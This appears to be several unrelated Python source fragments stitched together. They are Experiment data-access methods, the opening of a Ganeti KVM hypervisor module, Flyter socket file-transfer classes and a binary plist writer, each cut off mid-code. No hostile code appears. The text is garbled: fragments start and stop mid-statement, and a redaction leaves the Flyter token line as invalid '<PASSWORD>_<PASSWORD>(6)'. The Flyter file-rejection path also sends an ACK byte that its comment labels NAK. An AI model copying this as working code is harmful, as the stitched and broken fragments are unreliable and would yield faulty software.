logger.debug('Current object: {}'.format(new_exp))
finally:
# set log status back
exp._log = log
return new_exp
return inner
def get_data(self, sparse=None, copy=False):
'''Get the data as a 2d array
Get the data 2d array (each column is a feature and row is a sample)
Parameters
----------
sparse : None or bool, optional
None (default) to pass original data (sparse or dense).
True to get as sparse. False to get as dense
copy : bool, optional
True to get a copy of the data; otherwise, it can be
the original data or a copy (default).
Returns
-------
``Experiment.data``
'''
if sparse is None:
if copy:
return self.data.copy()
else:
return self.data
elif sparse:
if self.sparse:
if copy:
return self.data.copy()
else:
return self.data
else:
return scipy.sparse.csr_matrix(self.data)
else:
if self.sparse:
return self.data.toarray()
else:
if copy:
return self.data.copy()
else:
return self.data
@property
def shape(self):
return self.data.shape
def reorder(self, new_order, axis=0, inplace=False):
'''Reorder according to indices in the new order.
Note that we can also drop samples in new order.
Parameters
----------
new_order : Iterable of int or boolean mask
the order of new indices
axis : 0, 1, 's', or 'f'
the axis where the reorder occurs. 0 or 's' means reodering samples;
1 or 'f' means reordering features.
inplace : bool, optional
reorder in place.
Returns
-------
Experiment
experiment with reordered samples
'''
if inplace is False:
exp = self.copy()
else:
exp = self
# make it a np array; otherwise the slicing won't work if the new_order is
# a list of boolean and data is sparse matrix. For example:
# from scipy.sparse import csr_matrix
# a = csr_matrix((3, 4), dtype=np.int8)
# In [125]: a[[False, False, False], :]
# Out[125]:
# <3x4 sparse matrix of type '<class 'numpy.int8'>'
# In [126]: a[np.array([False, False, False]), :]
# Out[126]:
# <0x4 sparse matrix of type '<class 'numpy.int8'>'
# if new_order is empty, we want to return empty experiment
# it doesn't work for dense data is we use np.array([]) for the indexing
if len(new_order) > 0:
new_order = np.array(new_order)
if axis == 0:
exp.data = exp.data[new_order, :]
exp.sample_metadata = exp.sample_metadata.iloc[new_order, :]
else:
exp.data = exp.data[:, new_order]
if exp.feature_metadata is not None:
exp.feature_metadata = exp.feature_metadata.iloc[new_order, :]
return exp
def to_pandas(self, sample_field=None, feature_field=None, sparse=None):
'''Get a pandas dataframe of the abundances
Samples are rows, features are columns. Can specify the metadata fields
for the index (default is sample_metadata index) and column labels
(default is feature_metadata index)
Parameters
----------
sample_field : str or None, optional
Name of the sample_metadata column to use for index.
None (default) is the sample_metadata index
feature_field : str or None, optional
Name of the feature_metadata column to use for column names.
None (default) is the feature_metadata index
sparse: bool or None, optional
None (default) to get sparsity based on the underlying Experiment sparsity
True to force to sparse pandas.Dataframe
False to force to standard pandas.Dataframe
Returns
-------
pandas.Dataframe or pandas.SparseDataFrame
'''
if sample_field is None:
ind = self.sample_metadata.index
else:
ind = self.sample_metadata[sample_field]
if feature_field is None:
cols = self.feature_metadata.index
else:
cols = self.feature_metadata[feature_field]
if sparse is not None:
self.sparse = | |
<filename>lib/hypervisor/hv_kvm/__init__.py
#
#
# Copyright (C) 2008, 2009, 2010, 2011, 2012, 2013, 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""KVM hypervisor
"""
import errno
import os
import os.path
import re
import tempfile
import time
import logging
import pwd
import shutil
import urllib.request, urllib.error, urllib.parse
from bitarray import bitarray
try:
import psutil # pylint: disable=F0401
if psutil.version_info < (2, 0, 0):
# The psutil version seems too old, we ignore it
psutil_err = \
"too old (2.x.x or newer needed, %s found)" % psutil.__version__
psutil = None
else:
psutil_err = "<no error>"
except ImportError:
psutil_err = "not found"
psutil = None
from ganeti import utils
from ganeti import constants
from ganeti import errors
from ganeti import serializer
from ganeti import objects
from ganeti import uidpool
from ganeti import ssconf
from ganeti import netutils
from ganeti import pathutils
from ganeti.hypervisor import hv_base
from ganeti.utils import wrapper as utils_wrapper
from ganeti.hypervisor.hv_kvm.monitor import QmpConnection, QmpMessage, \
MonitorSocket
from ganeti.hypervisor.hv_kvm.netdev import OpenTap
from ganeti.hypervisor.hv_kvm.validation import check_boot_parameters, \
check_console_parameters, \
check_disk_cache_parameters, \
check_security_model,\
check_spice_parameters, \
check_vnc_parameters, \
validate_machine_version, \
validate_security_model, \
validate_spice_parameters, \
validate_vnc_parameters
_KVM_NETWORK_SCRIPT = pathutils.CONF_DIR + "/kvm-vif-bridge"
_KVM_START_PAUSED_FLAG = "-S"
# below constants show the format of runtime file
# the nics are in second possition, while the disks in 4th (last)
# moreover disk entries are stored as a list of in tuples
# (L{objects.Disk}, link_name, uri)
_KVM_NICS_RUNTIME_INDEX = 1
_KVM_DISKS_RUNTIME_INDEX = 3
_DEVICE_RUNTIME_INDEX = {
constants.HOTPLUG_TARGET_DISK: _KVM_DISKS_RUNTIME_INDEX,
constants.HOTPLUG_TARGET_NIC: _KVM_NICS_RUNTIME_INDEX
}
_FIND_RUNTIME_ENTRY = {
constants.HOTPLUG_TARGET_NIC:
lambda nic, kvm_nics: [n for n in kvm_nics if n.uuid == nic.uuid],
constants.HOTPLUG_TARGET_DISK:
lambda disk, kvm_disks: [(d, l, u) for (d, l, u) in kvm_disks
if d.uuid == disk.uuid]
}
_RUNTIME_DEVICE = {
constants.HOTPLUG_TARGET_NIC: lambda d: d,
constants.HOTPLUG_TARGET_DISK: lambda d_e_x: d_e_x[0]
}
_RUNTIME_ENTRY = {
constants.HOTPLUG_TARGET_NIC: lambda d, e: d,
constants.HOTPLUG_TARGET_DISK: lambda d, e: (d, e[0], e[1])
}
_DEVICE_TYPE = {
constants.HOTPLUG_TARGET_NIC: lambda hvp: hvp[constants.HV_NIC_TYPE],
constants.HOTPLUG_TARGET_DISK: lambda hvp: hvp[constants.HV_DISK_TYPE],
}
_DEVICE_DRIVER = {
constants.HOTPLUG_TARGET_NIC:
lambda ht: "virtio-net-pci" if ht == constants.HT_NIC_PARAVIRTUAL else ht,
constants.HOTPLUG_TARGET_DISK:
lambda ht: "virtio-blk-pci" if ht == constants.HT_DISK_PARAVIRTUAL else ht,
}
# NICs and paravirtual disks
# show up as devices on the PCI bus (one slot per device).
# SCSI disks will be placed on the SCSI bus.
_DEVICE_BUS = {
constants.HOTPLUG_TARGET_NIC:
lambda _: _PCI_BUS,
constants.HOTPLUG_TARGET_DISK:
lambda ht: _SCSI_BUS if ht in constants.HT_SCSI_DEVICE_TYPES else _PCI_BUS
}
_HOTPLUGGABLE_DEVICE_TYPES = {
# All available NIC types except for ne2k_isa
constants.HOTPLUG_TARGET_NIC: [
constants.HT_NIC_E1000,
constants.HT_NIC_I82551,
constants.HT_NIC_I8259ER,
constants.HT_NIC_I85557B,
constants.HT_NIC_NE2K_PCI,
constants.HT_NIC_PARAVIRTUAL,
constants.HT_NIC_PCNET,
constants.HT_NIC_RTL8139,
],
constants.HOTPLUG_TARGET_DISK: [
constants.HT_DISK_PARAVIRTUAL,
constants.HT_DISK_SCSI_BLOCK,
constants.HT_DISK_SCSI_GENERIC,
constants.HT_DISK_SCSI_HD,
constants.HT_DISK_SCSI_CD,
]
}
_PCI_BUS = "pci.0"
_SCSI_BUS = "scsi.0"
_MIGRATION_CAPS_DELIM = ":"
# in future make dirty_sync_count configurable
_POSTCOPY_SYNC_COUNT_THRESHOLD = 2 # Precopy passes before enabling postcopy
def _with_qmp(fn):
"""Wrapper used on hotplug related methods"""
def wrapper(self, *args, **kwargs):
"""Create a QmpConnection and run the wrapped method"""
if not getattr(self, "qmp", None):
for arg in args:
if isinstance(arg, objects.Instance):
instance = arg
break
else:
raise(RuntimeError("QMP decorator could not find"
" a valid ganeti instance object"))
filename = self._InstanceQmpMonitor(instance.name)# pylint: disable=W0212
self.qmp = QmpConnection(filename)
return fn(self, *args, **kwargs)
return wrapper
def _GetDriveURI(disk, link, uri):
"""Helper function to get the drive uri to be used in --drive kvm option
Invoked during startup and disk hot-add. In latter case and if no userspace
access mode is used it will be overriden with /dev/fdset/<fdset-id> (see
HotAddDisk() and AddFd() of QmpConnection).
@type disk: L{objects.Disk}
@param disk: A disk configuration object
@type link: string
@param link: The device link as returned by _SymlinkBlockDev()
@type uri: string
@param uri: The drive uri as returned by _CalculateDeviceURI()
@return: The drive uri to use in kvm option
"""
access_mode = disk.params.get(constants.LDP_ACCESS,
constants.DISK_KERNELSPACE)
# If uri is available, use it during startup/hot-add
if uri and access_mode == constants.DISK_USERSPACE:
drive_uri = uri
# Otherwise use the link previously created
else:
drive_uri = link
return drive_uri
def _GenerateDeviceKVMId(dev_type, dev):
"""Helper function to generate a unique device name used by KVM
QEMU monitor commands use names to identify devices. Since the UUID
is too long for a device ID (36 chars vs. 30), we choose to use
only the part until the third '-' with a disk/nic prefix.
For example if a disk has UUID '932df160-7a22-4067-a566-7e0ca8386133'
the resulting device ID would be 'disk-932df160-7a22-4067'.
@type dev_type: string
@param dev_type: device type of param dev (HOTPLUG_TARGET_DISK|NIC)
@type dev: L{objects.Disk} or L{objects.NIC}
@param dev: the device object for which we generate a kvm name
"""
return "%s-%s" % (dev_type.lower(), dev.uuid.rsplit("-", 2)[0])
def _GenerateDeviceHVInfoStr(hvinfo):
"""Construct the -device option string for hvinfo dict
PV disk: virtio-blk-pci,id=disk-1234,bus=pci.0,addr=0x9
PV NIC: virtio-net-pci,id=nic-1234,bus=pci.0,addr=0x9
SG disk: scsi-generic,id=disk-1234,bus=scsi.0,channel=0,scsi-id=1,lun=0
@type hvinfo: dict
@param hvinfo: dictionary created by _GenerateDeviceHVInfo()
@rtype: string
@return: The constructed string to be passed along with a -device option
"""
# work on a copy
d = dict(hvinfo)
hvinfo_str = d.pop("driver")
for k, v in d.items():
hvinfo_str += ",%s=%s" % (k, v)
return hvinfo_str
def _GenerateDeviceHVInfo(dev_type, kvm_devid, hv_dev_type, bus_slots):
"""Helper function to generate hvinfo of a device (disk, NIC)
hvinfo will hold all necessary info for generating the -device QEMU option.
We have two main buses: a PCI bus and a SCSI bus (created by a SCSI
controller on the PCI bus).
In case of PCI devices we add them on a free PCI slot (addr) on the first PCI
bus (pci.0), and in case of SCSI devices we decide to put each disk on a
different SCSI target (scsi-id) on the first SCSI bus (scsi.0).
@type dev_type: string
@param dev_type: either HOTPLUG_TARGET_DISK or HOTPLUG_TARGET_NIC
@type kvm_devid: string
@param kvm_devid: the id of the device
@type hv_dev_type: string
@param hv_dev_type: either disk_type or nic_type hvparam
@type bus_slots: dict
@param bus_slots: the current slots of the first PCI and SCSI buses
@rtype: dict
@return: dict including all necessary info (driver, id, bus and bus location)
for generating a -device QEMU option for either a disk or a NIC
"""
driver = _DEVICE_DRIVER[dev_type](hv_dev_type)
bus = _DEVICE_BUS[dev_type](hv_dev_type)
slots = bus_slots[bus]
slot = utils.GetFreeSlot(slots, reserve=True)
hvinfo = {
"driver": driver,
"id": kvm_devid,
"bus": bus,
}
if bus == _PCI_BUS:
hvinfo.update({
"addr": hex(slot),
})
elif bus == _SCSI_BUS:
hvinfo.update({
"channel": 0,
"scsi-id": slot,
"lun": 0,
})
return hvinfo
def _GetExistingDeviceInfo(dev_type, device, runtime):
"""Helper function to get an existing device inside the runtime file
Used when an instance is running. Load kvm runtime file and search
for a device based on its type and uuid.
@type dev_type: sting
@param dev_type: device type of param dev
@type device: L{objects.Disk} or L{objects.NIC}
@param device: the device object for which we generate a kvm name
@type runtime: tuple (cmd, nics, hvparams, disks)
@param runtime: the runtime data to search for the device
@raise errors.HotplugError: in case the requested device does not
exist (e.g. device has been added without --hotplug option)
"""
index = _DEVICE_RUNTIME_INDEX[dev_type]
found = _FIND_RUNTIME_ENTRY[dev_type](device, runtime[index])
if not found:
raise errors.HotplugError("Cannot find runtime info for %s with UUID %s" %
(dev_type, device.uuid))
return found[0]
def _UpgradeSerializedRuntime(serialized_runtime):
"""Upgrade runtime data
Remove any deprecated fields or change the format of the data.
The runtime files are not upgraded when Ganeti is upgraded, so the required
modification have to be performed | |
aborted operation")
except AssertionError:
return printerror("Receiver rejected")
except timeout:
return printerror("Operation timed out")
except Exception:
return printerror("Error while sending headers to receiver")
print(f"[ {gethostname()}-{b64encode(self.token).decode()} ] "
f"is now sending file ({ProgressBar.byte_rescale(fsize)})")
# Progress bar thread
self._progress_bar = ProgressBar(fsize, 40)
self._progress_bar.start()
def progress_thread():
try:
# Wait until sending file
while not self._sending_file:
pass
# Display until file is sent
while not self._progress_bar.done:
self._progress_bar.display()
except:
return printerror("Error with progress thread")
Thread(target=progress_thread).start()
# Start sending
res = None
try:
if self._transfer_type == 'S':
res = self._send_s(fpath, fsize)
elif self._transfer_type == 'M':
res = self._send_m(fpath, fsizes)
assert self.socket.recv(1) == b'\x06' # ACK
except:
self._progress_bar.stop()
self._sending_file = False
return printerror(f"Sending file was unsuccessful")
else:
# Wait for progress bar
while not self._progress_bar.done:
pass
self._progress_bar.display()
print(f"\nSuccessfully sent: {fname}")
return res
def recv_param_set(self):
"""
Receive and unpack Receiver's parameter settings.
Used to set Sender's parameter settings used during data
transmissions.
"""
try:
self.socket.connect((self.recver_ip, self.main_port))
except error:
return printerror("Can't connect to "
f"{self.recver_ip}:{self.main_port}")
try:
sender_hn = pack_str(gethostname())
len_sender_hn = int_to_bytes_s(len(sender_hn))
self.socket.send(b''.join([len_sender_hn, sender_hn]))
assert self.socket.recv(1) == b'\x06' # ACK
except AssertionError:
return printerror("Receiver rejected handshake")
except timeout:
return printerror('Operation timed out')
except:
return printerror("Error during handshake")
try:
len_hn = bytes_to_int_s(self.socket.recv(2))
self._recver_hostname = unpack_str(self.socket.recv(len_hn))
self._recver_token = self.socket.recv(6)
self._transfer_type = unpack_str(self.socket.recv(1))
len_wp = bytes_to_int_s(self.socket.recv(2))
self._worker_ports = [bytes_to_int_s(self.socket.recv(2))
for w in range(len_wp)]
self.socket.send(b'\x06') # ACK
except error:
return printerror("Error getting connected with socket")
except:
self.socket.send(b'\x15') # NAK
return printerror("Error getting parameters from receiver")
else:
self.param_set = True
class FlyterReciever:
"""
Handles Flyter file receiving processes.
Note: Receives from FlyterSender instances.
Parameters
----------
host_ip : str
The Host IP address to be used.
main_port : int
The main TCP port to be used.
num_workers : int
The amount of workers to be used during transmission.
"""
@staticmethod
def storage_dir(hostname=None):
"""
Return the path of the storage dir for received files.
If storage directory doesn't exist, creates it first.
Parameters
----------
hostname : str
The name of the subdirectory where that
host's sent files are stored.
"""
app_dirname = dirname(__file__)
appfiles_dirname = join(app_dirname, 'Flyter')
if not exists(appfiles_dirname):
mkdir(appfiles_dirname)
storage_dirname = join(appfiles_dirname, 'Received Files')
if not exists(storage_dirname):
mkdir(storage_dirname)
if hostname:
host_storage_dirname = join(storage_dirname, hostname)
if not exists(host_storage_dirname):
mkdir(host_storage_dirname)
return host_storage_dirname
else:
return storage_dirname
DEFAULT_PACKET_SIZE = 512
def __init__(self, host_ip, main_port, num_workers):
self.host_ip = host_ip
self.main_port = main_port
self.token = <PASSWORD>_<PASSWORD>(6)
self.transfer_type = 'S' if num_workers == 1 else 'M'
self.worker_ports = [
random_port(self.host_ip) for w in range(num_workers)
] if num_workers > 1 else []
self._sender_socket = None
self._sender_hostname = None
self._sender_token = None
self._sender_filename = None
self._sender_filesizes = None
self._packet_size = FlyterSender.DEFAULT_PACKET_SIZE
self._recving_file = False
self._workers_active = 0
self._progress_bar = ProgressBar(None)
try:
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.bind((self.host_ip, self.main_port))
self.socket.settimeout(60)
self.workers = [
socket(AF_INET, SOCK_STREAM) for w in range(num_workers)
] if num_workers > 1 else []
if self.workers:
for w in range(num_workers):
self.workers[w].bind((self.host_ip, self.worker_ports[w]))
self.workers[w].settimeout(60)
except:
printerror('Error initializing sockets')
self.param_set = False
def __del__(self):
if isinstance(self.__dict__.get('socket'), socket):
self.socket.close()
if self.__dict__.get('workers'):
for w in self.workers:
w.close()
def _recv_s(self):
"""Receive a file with a single worker."""
if not self.param_set:
return printerror("Sender not yet set with parameters")
try:
self._recving_file = True
path = join(
FlyterReciever.storage_dir(self._sender_hostname),
self._sender_filename
)
fs = self._sender_filesizes[0]
with open(path, 'bw') as f:
while self._recving_file and fs:
packet = self._sender_socket.recv(self._packet_size)
f.write(packet)
self._progress_bar.add_progress(len(packet))
fs -= len(packet)
self._sender_socket.send(b'\x06') # ACK
except timeout:
self._progress_bar.stop()
return printerror("Operation timed out")
except FileNotFoundError:
self._progress_bar.stop()
return printerror("Downloading file has been deleted")
except PermissionError:
self._progress_bar.stop()
return printerror("Couldn't access storage directory")
except error:
self._progress_bar.stop()
return printerror("Error with socket")
except:
self._progress_bar.stop()
return printerror("Error receiving file")
else:
self._recving_file = False
return True
def _recv_m(self):
"""
Receive a file with multiple workers.
Speeds up transmission rate by using multiple workers.
"""
if not self.param_set:
return printerror("Sender not yet set with parameters")
def threadfunc(worker_num, fpath):
self._workers_active += 1
try:
recver_socket = self.workers[worker_num]
recver_socket.listen(1)
sender_socket, hostaddr = recver_socket.accept()
send_tok = sender_socket.recv(6)
if send_tok == self._sender_token:
sender_socket.send(b'\x06') # ACK
else:
sender_socket.send(b'\x15') # NAK
fs = self._sender_filesizes[worker_num]
with open(fpath, 'bw') as f:
while self._recving_file and f.writable() and fs:
packet = sender_socket.recv(self._packet_size)
f.write(packet)
self._progress_bar.add_progress(len(packet))
fs -= len(packet)
sender_socket.send(b'\x06') # ACK
except KeyboardInterrupt:
self._progress_bar.stop()
self._recving_file = False
return printerror("User aborted operation")
except timeout:
self._progress_bar.stop()
self._recving_file = False
return printerror("Operation timed out")
except error:
self._progress_bar.stop()
self._recving_file = False
return printerror("Error with sockets")
except:
self._progress_bar.stop()
self._recving_file = False
return printerror("Error while receiving file")
finally:
self._workers_active -= 1
num_workers = len(self.workers)
self._recving_file = True
try:
for w in range(len(self.worker_ports)):
wpath = join(
FlyterReciever.storage_dir(self._sender_hostname),
f"{w}_{self._sender_filename}"
)
Thread(
target=threadfunc,
args=(w, wpath),
).start()
except FileNotFoundError:
return printerror("Couldn't access file")
except PermissionError:
return printerror("Couldn't access file due to permission error")
while self._workers_active:
try:
pass
except KeyboardInterrupt:
self._progress_bar.stop()
self._recving_file = False
printerror("User aborted operation")
self._recving_file = False
try:
# Build the file
path = join(
FlyterReciever.storage_dir(self._sender_hostname),
self._sender_filename
)
with open(path, 'bw') as output:
for w in range(num_workers):
wpath = join(
FlyterReciever.storage_dir(self._sender_hostname),
f"{w}_{self._sender_filename}"
)
with open(wpath, 'br') as temp:
packet = True
while packet:
packet = temp.read(self._packet_size)
output.write(packet)
# Clear the contents of the temp file
open(wpath, 'bw').close()
# Delete the temp files
for w in range(num_workers):
wpath = join(
FlyterReciever.storage_dir(self._sender_hostname),
f"{w}_{self._sender_filename}"
)
unlink(wpath)
except PermissionError:
self._sender_socket.send(b'\x15') # NAK
return printerror("Couldn't save file due to permissions")
except error:
return printerror("Error with sockets")
except:
self._sender_socket.send(b'\x15') # NAK
return printerror("Error while saving file")
else:
return True
def recv_file(self):
"""Receive a file."""
if not self.param_set:
return printerror("Not yet set with receiver's parameters")
# Headers
try:
tok = self._sender_socket.recv(6)
b64_tok = b64encode(tok).decode()
len_fn = bytes_to_int_s(self._sender_socket.recv(2))
fn = unpack_str(self._sender_socket.recv(len_fn))
len_fs = bytes_to_int_s(self._sender_socket.recv(2))
fs = [bytes_to_int_l(self._sender_socket.recv(4))
for s in range(len_fs)]
fs_all = sum(fs)
answer = input(f"{self._sender_hostname}-{b64_tok}"
f" wants to send: {fn} "
f"({ProgressBar.byte_rescale(fs_all)}). "
"Accept? (y/n) ")
if answer.lower() == 'y':
self._sender_socket.send(b'\x06') # ACK
else:
self._sender_socket.send(b'\x06') # NAK
return printalert("Rejected file transfer")
except error:
return printerror("Sender isn't available anymore")
except:
self._sender_socket.send(b'\x15') # NAK
return printerror("Error while receiving headers")
print(f"[ {gethostname()}-{b64encode(self.token).decode()} ] "
f"is now receiving file ({ProgressBar.byte_rescale(fs_all)})")
# Progress bar thread
self._progress_bar = ProgressBar(fs_all, 35)
self._progress_bar.start()
def progress_thread():
try:
# Wait until receiving file
while not self._recving_file:
pass
# Display until file is received
while not self._progress_bar.done:
self._progress_bar.display()
except:
return printerror("Error with progress thread")
Thread(target=progress_thread).start()
self._sender_token = tok
self._sender_filename = fn
self._sender_filesizes = fs
# Start receiving
try:
if self.transfer_type == 'S':
res = self._recv_s()
elif self.transfer_type == 'M':
res = self._recv_m()
else:
res = None
except:
self._progress_bar.stop()
self._recving_file = False
return printerror("Receiving file was unsuccessful")
else:
self._sender_socket.send(b'\x06') # ACK
# Wait for progress bar
while not self._progress_bar.done:
pass
self._progress_bar.display()
print(f"\nSuccessfully received: {self._sender_filename}")
return res
def send_param_set(self):
"""
Pack and send Receiver's parameter settings.
Used to set Sender's parameter settings used during
data transmissions.
"""
try:
printalert("Waiting for sender")
self.socket.listen(1)
self._sender_socket, addrport = self.socket.accept()
except timeout:
return printerror("No sender available")
except:
return printerror("Error while waiting for sender")
try:
len_sender_hn = bytes_to_int_s(self._sender_socket.recv(2))
sender_hn = self._sender_socket.recv(len_sender_hn)
self._sender_hostname = unpack_str(sender_hn)
self._sender_socket.send(b'\x06') # ACK
except timeout:
return printerror("Operation timed out")
except:
return printerror("Error during handshake")
try:
hn = pack_str(gethostname())
len_hn = int_to_bytes_s(len(hn))
tok = self.token
tr_type = pack_str(self.transfer_type)
len_wp = int_to_bytes_s(len(self.worker_ports))
wp = [int_to_bytes_s(port)
for port in self.worker_ports]
wp = b''.join(wp)
headers = b''.join([len_hn, hn, tok, tr_type, len_wp, wp])
except:
return printerror("Error building headers")
try:
self._sender_socket.send(headers)
assert self._sender_socket.recv(1) == b'\x06' # ACK
except:
return printerror("Error while sending headers to sender")
else:
self.param_set = True
# Simplified Functions
def send(ip_address, port, filepath):
"""
Send file to receiver on the same network.
Parameters
----------
ip_address : str
The target receiver's IP address.
port : int
The target receiver's main TCP port.
filepath : str
The path to the file to be sent.
"""
sender = FlyterSender(ip_address, port)
sender.recv_param_set()
return sender.send_file(filepath)
def receive(host_ip_address, port, workers=1):
"""
Receive a file from sender on the same network.
Parameters
----------
host_ip_address : str
The receiver's host IP address.
port : int
The receiver's host port to listen on.
workers : :obj:`int`, optional
The number of workers to use.
"""
receiver = FlyterReciever(host_ip_address, port, workers)
receiver.send_param_set()
receiver.recv_file()
if __name__ == '__main__':
parser = ArgumentParser(
prog="Flyter",
epilog="See | |
odd-sized or integers larger than 8 bytes
# Don't naively go over 16 bytes, in order to prevent infinite loops.
result = 0
if hasattr(int, 'from_bytes'):
result = int.from_bytes(data, 'big')
else:
for byte in data:
result = (result << 8) | unpack('>B', byte)[0]
else:
raise InvalidPlistException("Encountered integer longer than 16 bytes.")
return result
class HashableWrapper(object):
def __init__(self, value):
self.value = value
def __repr__(self):
return "<HashableWrapper: %s>" % [self.value]
class BoolWrapper(object):
def __init__(self, value):
self.value = value
def __repr__(self):
return "<BoolWrapper: %s>" % self.value
class FloatWrapper(object):
_instances = {}
def __new__(klass, value):
# Ensure FloatWrapper(x) for a given float x is always the same object
wrapper = klass._instances.get(value)
if wrapper is None:
wrapper = object.__new__(klass)
wrapper.value = value
klass._instances[value] = wrapper
return wrapper
def __repr__(self):
return "<FloatWrapper: %s>" % self.value
class PlistWriter(object):
header = b'bplist00bybiplist1.0'
file = None
byteCounts = None
trailer = None
computedUniques = None
writtenReferences = None
referencePositions = None
wrappedTrue = None
wrappedFalse = None
def __init__(self, file):
self.reset()
self.file = file
self.wrappedTrue = BoolWrapper(True)
self.wrappedFalse = BoolWrapper(False)
def reset(self):
self.byteCounts = PlistByteCounts(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
self.trailer = PlistTrailer(0, 0, 0, 0, 0)
# A set of all the uniques which have been computed.
self.computedUniques = set()
# A list of all the uniques which have been written.
self.writtenReferences = {}
# A dict of the positions of the written uniques.
self.referencePositions = {}
def positionOfObjectReference(self, obj):
"""If the given object has been written already, return its
position in the offset table. Otherwise, return None."""
return self.writtenReferences.get(obj)
def writeRoot(self, root):
"""
Strategy is:
- write header
- wrap root object so everything is hashable
- compute size of objects which will be written
- need to do this in order to know how large the object refs
will be in the list/dict/set reference lists
- write objects
- keep objects in writtenReferences
- keep positions of object references in referencePositions
- write object references with the length computed previously
- computer object reference length
- write object reference positions
- write trailer
"""
output = self.header
wrapped_root = self.wrapRoot(root)
should_reference_root = True#not isinstance(wrapped_root, HashableWrapper)
self.computeOffsets(wrapped_root, asReference=should_reference_root, isRoot=True)
self.trailer = self.trailer._replace(**{'objectRefSize':self.intSize(len(self.computedUniques))})
(_, output) = self.writeObjectReference(wrapped_root, output)
output = self.writeObject(wrapped_root, output, setReferencePosition=True)
# output size at this point is an upper bound on how big the
# object reference offsets need to be.
self.trailer = self.trailer._replace(**{
'offsetSize':self.intSize(len(output)),
'offsetCount':len(self.computedUniques),
'offsetTableOffset':len(output),
'topLevelObjectNumber':0
})
output = self.writeOffsetTable(output)
output += pack('!xxxxxxBBQQQ', *self.trailer)
self.file.write(output)
def wrapRoot(self, root):
if isinstance(root, bool):
if root is True:
return self.wrappedTrue
else:
return self.wrappedFalse
elif isinstance(root, float):
return FloatWrapper(root)
elif isinstance(root, set):
n = set()
for value in root:
n.add(self.wrapRoot(value))
return HashableWrapper(n)
elif isinstance(root, dict):
n = {}
for key, value in iteritems(root):
n[self.wrapRoot(key)] = self.wrapRoot(value)
return HashableWrapper(n)
elif isinstance(root, list):
n = []
for value in root:
n.append(self.wrapRoot(value))
return HashableWrapper(n)
elif isinstance(root, tuple):
n = tuple([self.wrapRoot(value) for value in root])
return HashableWrapper(n)
else:
return root
def incrementByteCount(self, field, incr=1):
self.byteCounts = self.byteCounts._replace(**{field:self.byteCounts.__getattribute__(field) + incr})
def computeOffsets(self, obj, asReference=False, isRoot=False):
def check_key(key):
if key is None:
raise InvalidPlistException('Dictionary keys cannot be null in plists.')
elif isinstance(key, Data):
raise InvalidPlistException('Data cannot be dictionary keys in plists.')
elif not isinstance(key, (bytes, unicode)):
raise InvalidPlistException('Keys must be strings.')
def proc_size(size):
if size > 0b1110:
size += self.intSize(size)
return size
# If this should be a reference, then we keep a record of it in the
# uniques table.
if asReference:
if obj in self.computedUniques:
return
else:
self.computedUniques.add(obj)
if obj is None:
self.incrementByteCount('nullBytes')
elif isinstance(obj, BoolWrapper):
self.incrementByteCount('boolBytes')
elif isinstance(obj, Uid):
size = self.intSize(obj)
self.incrementByteCount('uidBytes', incr=1+size)
elif isinstance(obj, (int, long)):
size = self.intSize(obj)
self.incrementByteCount('intBytes', incr=1+size)
elif isinstance(obj, FloatWrapper):
size = self.realSize(obj)
self.incrementByteCount('realBytes', incr=1+size)
elif isinstance(obj, datetime.datetime):
self.incrementByteCount('dateBytes', incr=2)
elif isinstance(obj, Data):
size = proc_size(len(obj))
self.incrementByteCount('dataBytes', incr=1+size)
elif isinstance(obj, (unicode, bytes)):
size = proc_size(len(obj))
self.incrementByteCount('stringBytes', incr=1+size)
elif isinstance(obj, HashableWrapper):
obj = obj.value
if isinstance(obj, set):
size = proc_size(len(obj))
self.incrementByteCount('setBytes', incr=1+size)
for value in obj:
self.computeOffsets(value, asReference=True)
elif isinstance(obj, (list, tuple)):
size = proc_size(len(obj))
self.incrementByteCount('arrayBytes', incr=1+size)
for value in obj:
asRef = True
self.computeOffsets(value, asReference=True)
elif isinstance(obj, dict):
size = proc_size(len(obj))
self.incrementByteCount('dictBytes', incr=1+size)
for key, value in iteritems(obj):
check_key(key)
self.computeOffsets(key, asReference=True)
self.computeOffsets(value, asReference=True)
else:
raise InvalidPlistException("Unknown object type.")
def writeObjectReference(self, obj, output):
"""Tries to write an object reference, adding it to the references
table. Does not write the actual object bytes or set the reference
position. Returns a tuple of whether the object was a new reference
(True if it was, False if it already was in the reference table)
and the new output.
"""
position = self.positionOfObjectReference(obj)
if position is None:
self.writtenReferences[obj] = len(self.writtenReferences)
output += self.binaryInt(len(self.writtenReferences) - 1, byteSize=self.trailer.objectRefSize)
return (True, output)
else:
output += self.binaryInt(position, byteSize=self.trailer.objectRefSize)
return (False, output)
def writeObject(self, obj, output, setReferencePosition=False):
"""Serializes the given object to the output. Returns output.
If setReferencePosition is True, will set the position the
object was written.
"""
def proc_variable_length(format, length):
result = b''
if length > 0b1110:
result += pack('!B', (format << 4) | 0b1111)
result = self.writeObject(length, result)
else:
result += pack('!B', (format << 4) | length)
return result
if isinstance(obj, (str, unicode)) and obj == unicodeEmpty:
# The Apple Plist decoder can't decode a zero length Unicode string.
obj = b''
if setReferencePosition:
self.referencePositions[obj] = len(output)
if obj is None:
output += pack('!B', 0b00000000)
